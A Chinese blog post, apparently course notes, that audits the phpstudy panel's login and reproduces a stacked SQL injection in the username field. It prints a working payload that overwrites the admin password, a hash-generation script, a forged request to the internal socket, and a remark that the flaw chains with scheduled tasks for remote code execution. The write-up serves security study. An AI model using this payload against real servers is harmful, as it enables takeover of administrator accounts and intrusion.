当前位置: 首页 > article >正文

我在 bilibili 学代码审计

     前几天在 B 站上看到一节录播课,感觉学习到了很多东西,反复观看仍不过瘾,所以决定写下这篇文章以做笔记。

漏洞简介

  漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payload 实现存储型 XSS ,结合小皮本身所具有的计划任务,XSS + CSRF 实现了 RCE 。因为用户名登录处缺少过滤,所以可以尝试 SQL 漏洞。

环境搭建

  windows 上实际操作了一下,不方便进行分析

  于是利用 linux 来进行复现分析,利用官网提供的方法执行,之后再回滚修改代码

  wget -O install.sh https://download.xp.cn/install.sh && sudo bash install.sh

  修改代码 web/service/app/account.php 中登录的部分

if($type=='login'){
    $username = post('username');
    $pwd = post('password');
    $verifycode = post('verifycode');
    $res = Account::login($username,$pwd,$verifycode);
    xpexit(json_encode($res));
}
fa206790d0fb824367920128050afd79.png

  打开代码 /usr/local/phpstudy/web/service/app/account.php 修改代码

2ab92a2f272947799042fceb89ba9767.png

漏洞复现

windows

  ‍

  在用户登录处构造 payload 其中 PASSWORD 的值是经过五次 md5 加密后的结果

import hashlib

str = "123456"
for i in range(0,5):
    str = hashlib.md5(str.encode()).hexdigest()
print(str)

  ‍

admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--
f24025e3cbc840af5002c4647a082eb4.png

  虽然提示用户名密码错误,但是密码已经被更新,再次利用 admin/123456 成功登录

  ‍

Linux

  在用户登录处构造 payload

admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--
35cf8db8485610b11614cd483e7e7fc3.png

  错误类型并不相同,但也成功的将密码修改

漏洞分析

5ddafd140f505f967de2277bbae429fd.png

  查看开放端口信息 ,发现有两个端口与 phpstudy 的进程相关 9080、8090

  9080 对应的是 web 端的信息 8090 对应的是二进制程序

4bc329e5202c2915ccfb5deb4d0e9ee7.png

  外部访问不到 8090 端口 只能再内部构造数据进行通信

0f6041ab43c606b1b603bc37f9a9f175.png

  项目的代码在 /usr/local/phpstudy/web

  web/service/app/account.php

8c40d3cc70d8e4cb7679e2330d222119.png

  web/service/app/model/Account.php

015b6e94fce2d69a42621520f53d1a43.png

  通过 POST 获取到的数据,利用 Socket 将数据发送到 8090 进行处理

b0651678ab7a19569b3157cbcaf39700.png

  我们可以根据代码逻辑伪造 socket 请求

{"command":"login","data":{"username":"admin","pwd":"123456"}}^^^
2aaf8d6312a600fefe1ef3de7c195fc0.png

  利用 strace 可以监控进程 strace -s4096 -tt -f -ewrite -p 49433 监控 phpstudy 的进程,发送错误的payload

{"command":"login","data":{"username":"admin'","pwd":"123456"}}^^^
6a8c5ef211b6f1b6b57e3b23264122c7.png

  获取到登录时对应的 SQL 语句

SELECT ID FROM ADMINS WHERE ALIAS = 'admin'' AND PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' AND STATUS = 0

  根据 SQL 语句可以构造恶意语句,构造恶意语句,执行错误的 SQL 语句后,程序会发生崩溃,所以无法利用万能密码登录。

  这里我们可以思考利用堆叠注入,执行多个 SQL 语句,修改 admin 用户密码。我们构造这样的用户名

admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--

  拼接到 SQL 语句中就为

SELECT ID FROM ADMINS WHERE ALIAS = 'admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--' AND PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' AND STATUS = 0

  最终执行的 SQL 语句为

SELECT ID FROM ADMINS WHERE ALIAS = 'admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';

  将用户 admin 的 密码修改为了 123456

  再次登录时就可以使用 admin/123456 成功登录,再结合之前的 1-click RCE 中利用 phpstudy 后台计划任务执行,最终实现未授权 RCE 。

  第一次登录时 使用 admin/123456 登录失败,提示用户名或者密码错误

e14a0a9f4d96c4f000326264787b153b.png

  输入构造的 payload

5df660abe8ec7dd1c7adad41d54566ed.png

  再次利用 admin/123456 登录成功,用户的密码已经被修改

05ede20b0bd24e461d506477af3b1eac.png 2b41c3b2f6f26656242cffd5b7b84a38.png

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

745ec04381581ff8fb31f754cbcc32e8.gif

靶场实操,戳“阅读原文“


http://www.kler.cn/a/6452.html

相关文章:

  • 项目中如何排查JVM问题?
  • java全栈day20--Web后端实战(Mybatis基础2)
  • Mysql复习(二)
  • CS 144 check5: down the stack (the network interface)
  • 重拾设计模式--建造者模式
  • 关于使用拓扑排序算法实现解析勾稽关系优先级的研究和实现
  • Haar特征
  • 【CSS】课程网站横版导航栏 ( 横版导航栏测量及样式 | 代码示例 )
  • Linux中vi编辑器使用及ps系统管理命令
  • 如何看待 Chat-GPT 的崛起
  • Hibernate多表关联——(一对多关系)
  • 设计模式之责任链模式
  • 【Ruby学习笔记】15.Ruby 异常
  • 如何切换node版本
  • 【从零开始学习 UVM】9.3、UVM Config DB —— uvm_config_db 示例【文章最后的表格对于理解路径索引很重要】
  • 贪心算法(四)
  • 计算机网络考试复习——第一章 1.5 1.6
  • 【Java代码审计】表达式注入
  • SQL之存储函数
  • WebRTC Probe 探测码率、transport-cc作用
  • BGP 十一条选路原则与BGP路由传递的注意事项介绍
  • 玩转git的第6章节:git的smart checkout与force checkout
  • ping协议(ICMP)的原理
  • 家电行业采购-分销-电商-仓储业务用契约锁电子签,提效95%
  • 力扣(134.860.406.452)补9.26
  • Spring框架AOP增强,动态代理